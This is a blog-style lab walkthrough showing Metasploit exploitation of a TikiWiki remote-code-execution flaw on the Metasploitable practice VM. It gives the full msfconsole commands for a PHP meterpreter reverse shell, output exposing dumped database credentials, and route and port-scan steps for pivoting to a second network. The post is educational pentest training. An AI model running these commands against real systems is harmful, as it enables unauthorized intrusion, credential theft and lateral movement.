The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.
Preamble
This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.
This exercise is going to demonstrate how to use an "external" web application exploit rather then a client exploit to get the initial toe hold and an introduction to the php meterpreter.
Requirements and Background
Please review the previous posts. This exercise builds on some of the lessons learned.
Process
We start this post assuming that you have already done your recon and discovery to find a vulnerability that can be exploited. (always do recon first!)
This particular system has an vulnerability in the tikiwiki software. In fact, the server that we are exploiting (the metasploitable virtual machine available from metasploit.com) has multiple vulnerabilities.
msf use exploit/unix/webapp/tikiwiki_graph_formula_exec
msf exploit(tikiwiki_graph_formula_exec) > set rhost 10.13.37.245
msf exploit(tikiwiki_graph_formula_exec) > set payload php/meterpreter/reverse_tcp
msf exploit(tikiwiki_graph_formula_exec) > exploit
[*] Started reverse handler on 10.13.37.136:80
[*] Attempting to obtain database credentials...
[*] The server returned : 200 OK
[*] Server version : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
[*] TikiWiki database informations :
db_tiki : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : root
pass_tiki : root
dbs_tiki : tikiwiki195
[*] Attempting to execute our payload...
[*] Sending stage (29389 bytes) to 10.13.37.245
[*] Meterpreter session 3 opened (10.13.37.136:80 -> 10.13.37.245:47584) at 2010-11-03 18:57:55 -0400
Explanation - We set the exploit in Metasploit to use the tikiwiki graph exploit and used the php meterpreter payload. The php meterpreter is an amazing exploit, implementing many of the features of the standard meterpreter. See http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html for details on what is possible using php meterpreter,
Let's see what we got
meterpreter > sysinfo
Computer: metasploitable
OS : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
after some more looking around look what we find
meterpreter > cat /var/lib/dhcp3/dhclient.leases
lease {
interface "eth1";
fixed-address 10.2.2.130;
option subnet-mask 255.255.255.0;
option dhcp-lease-time 1800;
option dhcp-message-type 5;
option domain-name-servers 10.2.2.1;
option dhcp-server-identifier 10.2.2.254;
option broadcast-address 10.2.2.255;
option domain-name "localdomain";
rebind 3 2010/11/3 23:34:00;
renew 3 2010/11/3 23:22:20;
expire 3 2010/11/3 23:37:45;
}
Excellent, there is second nic attached to a different NIC.
We can use the same route commands and scanners as in part 3 to explore the new network
meterpreter> <ctrl> <z>
msf exploit(tikiwiki_graph_formula_exec) > route add 10.2.2.0 255.255.255.0 4
msf exploit(tikiwiki_graph_formula_exec) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set rhosts 10.2.2.130
msf auxiliary(tcp) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 10.2.2.130 yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
VERBOSE false no Display verbose output
msf auxiliary(tcp) > set ports 135-139,445
msf auxiliary(tcp) > run
[*] 10.2.2.129:135 - TCP OPEN
[*] 10.2.2.129:139 - TCP OPEN
[*] 10.2.2.129:445 - TCP OPEN
Interesting note. In previous exercises, I have typed exploit, not run. It turns out proper protocol is to use run when your auxiliary tools, exploit for exploits, although for now, exploit is aliased to run.
As before, we can now try some exploits against this new host, pivoting through the web server.
The end....again.....for now....
No comments:
Post a Comment